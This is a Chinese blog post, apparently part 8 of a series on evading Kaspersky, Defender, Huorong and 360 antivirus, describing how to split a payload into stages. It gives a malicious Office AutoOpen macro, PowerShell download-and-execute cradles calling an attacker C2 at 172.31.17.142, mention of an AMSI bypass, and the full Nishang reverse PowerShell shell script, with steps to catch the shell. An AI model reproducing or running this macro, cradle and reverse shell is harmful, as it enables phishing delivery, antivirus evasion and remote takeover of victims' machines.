长亭百川云 - 文章详情

卡巴defender火绒360免杀十种方法8: 化整为零

奶牛安全

58

2024-07-13

环境

  • 带有 Ubuntu Linux AMI 的 AWS EC2 作为攻击者 C2 服务器。

  • 带有 Windows Server 2019 AMI 的 AWS EC2 作为受害者机器。

  • 安装 Visual Studio 2022 社区的本地 Windows 10 计算机用于恶意软件开发和编译

  • 本地 Kali Linux 攻击机。

过程

无论如何将有效载荷化整为零分成不同执行阶段都不是新技术,威胁参与者通常使用它来传播可以绕过初始静态分析的恶意软件。这是因为真正的恶意负载将在稍后阶段解码和执行,静态分析可能没有机会发挥作用。

对于此 PoC,将展示一种非常简单但有效的方法来分解反向 shell 负载,例如,可用于使用以下宏创建恶意 Office 文件:

执行第一阶段的宏

Sub AutoOpen()Set shell_object = CreateObject("WScript.Shell")shell_object.Exec ("powershell -c IEX(New-Object Net.WebClient).downloadString('http://IP:PORT/stage1.ps1')")End Sub

当然,这不会被 AV 静态检测到,因为它只是在执行一个看似良性的命令。

由于实验机器没有安装 Office,将通过在 PowerShell 脚本中手动执行上述命令来模拟网络钓鱼过程。

最后,本节的PoC如下:

  • stage0.txt(这将是在网络钓鱼宏中执行的命令)
IEX(New-Object Net.WebClient).downloadString("http://172.31.17.142:8080/stage1.txt")
  • stage1.txt
IEX(New-Object Net.WebClient).downloadString("http://172.31.17.142:8080/ref.txt")IEX(New-Object Net.WebClient).downloadString("http://172.31.17.142:8080/stage2.txt")
  • stage2.txt
function Invoke-PowerShellTcp { <#.SYNOPSISNishang script which can be used for Reverse or Bind interactive PowerShell from a target. .DESCRIPTIONThis script is able to connect to a standard netcat listening on a port when using the -Reverse switch. Also, a standard netcat can connect to this script Bind to a specific port.The script is derived from Powerfun written by Ben Turner & Dave Hardy.PARAMETER IPAddressThe IP address to connect to when using the -Reverse switch..PARAMETER PortThe port to connect to when using the -Reverse switch. When using -Bind it is the port on which this script listens..EXAMPLEPS > Invoke-PowerShellTcp -Reverse -IPAddress 192.168.254.226 -Port 4444Above shows an example of an interactive PowerShell reverse connect shell. A netcat/powercat listener must be listening on the given IP and port. .EXAMPLEPS > Invoke-PowerShellTcp -Bind -Port 4444Above shows an example of an interactive PowerShell bind connect shell. Use a netcat/powercat to connect to this port. .EXAMPLEPS > Invoke-PowerShellTcp -Reverse -IPAddress fe80::20c:29ff:fe9d:b983 -Port 4444Above shows an example of an interactive PowerShell reverse connect shell over IPv6. A netcat/powercat listener must belistening on the given IP and port. .LINKhttp://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.htmlhttps://github.com/nettitude/powershell/blob/master/powerfun.ps1https://github.com/samratashok/nishang#>          [CmdletBinding(DefaultParameterSetName="reverse")] Param(        [Parameter(Position = 0, Mandatory = $true, ParameterSetName="reverse")]        [Parameter(Position = 0, Mandatory = $false, ParameterSetName="bind")]        [String]        $IPAddress,        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="reverse")]        [Parameter(Position = 1, Mandatory = $true, ParameterSetName="bind")]        [Int]        $Port,        [Parameter(ParameterSetName="reverse")]        [Switch]        $Reverse,        [Parameter(ParameterSetName="bind")]        [Switch]        $Bind    )        try     {        #Connect back if the reverse switch is used.        if ($Reverse)        {            $client = New-Object System.Net.Sockets.TCPClient($IPAddress,$Port)        }        #Bind to the provided port if Bind switch is used.        if ($Bind)        {            $listener = [System.Net.Sockets.TcpListener]$Port            $listener.start()                $client = $listener.AcceptTcpClient()        }         $stream = $client.GetStream()        [byte[]]$bytes = 0..65535|%{0}        #Send back current username and computername        $sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")        $stream.Write($sendbytes,0,$sendbytes.Length)        #Show an interactive PowerShell prompt        $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '>')        $stream.Write($sendbytes,0,$sendbytes.Length)        while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)        {            $EncodedText = New-Object -TypeName System.Text.ASCIIEncoding            $data = $EncodedText.GetString($bytes,0, $i)            try            {                #Execute the command on the target.                $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )            }            catch            {                Write-Warning "Something went wrong with execution of command on the target."                 Write-Error $_            }            $sendback2  = $sendback + 'PS ' + (Get-Location).Path + '> '            $x = ($error[0] | Out-String)            $error.clear()            $sendback2 = $sendback2 + $x            #Return the results            $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)            $stream.Write($sendbyte,0,$sendbyte.Length)            $stream.Flush()          }        $client.Close()        if ($listener)        {            $listener.Stop()        }    }    catch    {        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."         Write-Error $_    }}Invoke-PowerShellTcp -Reverse -IPAddress 172.31.17.142 -Port 80

这里有几件事要注意。首先,ref.txt 是一个简单的 PowerShell AMSI 绕过,它允许当前的 PowerShell 进程修补内存中 AMSI 扫描。此外,在这种情况下,PowerShell 脚本的扩展名无关紧要,因为它们的内容将作为文本简单地下载并使用 Invoke-Expression(IEX 的别名)调用。

然后可以执行完整的 PoC,如下所示:

  • 在受害机器中执行阶段 0

  • 受害机器从 C2 下载阶段

  • 在攻击者服务器中获取反向 shell

请点一下右下角的“在看”,谢谢!!

请帮忙点赞, 谢谢!!

请帮忙转发,谢谢!!

暗号: 022255

相关推荐
关注或联系我们
添加百川云公众号,移动管理云安全产品
咨询热线:
4000-327-707
百川公众号
百川公众号
百川云客服
百川云客服

Copyright ©2024 北京长亭科技有限公司
icon
京ICP备 2024055124号-2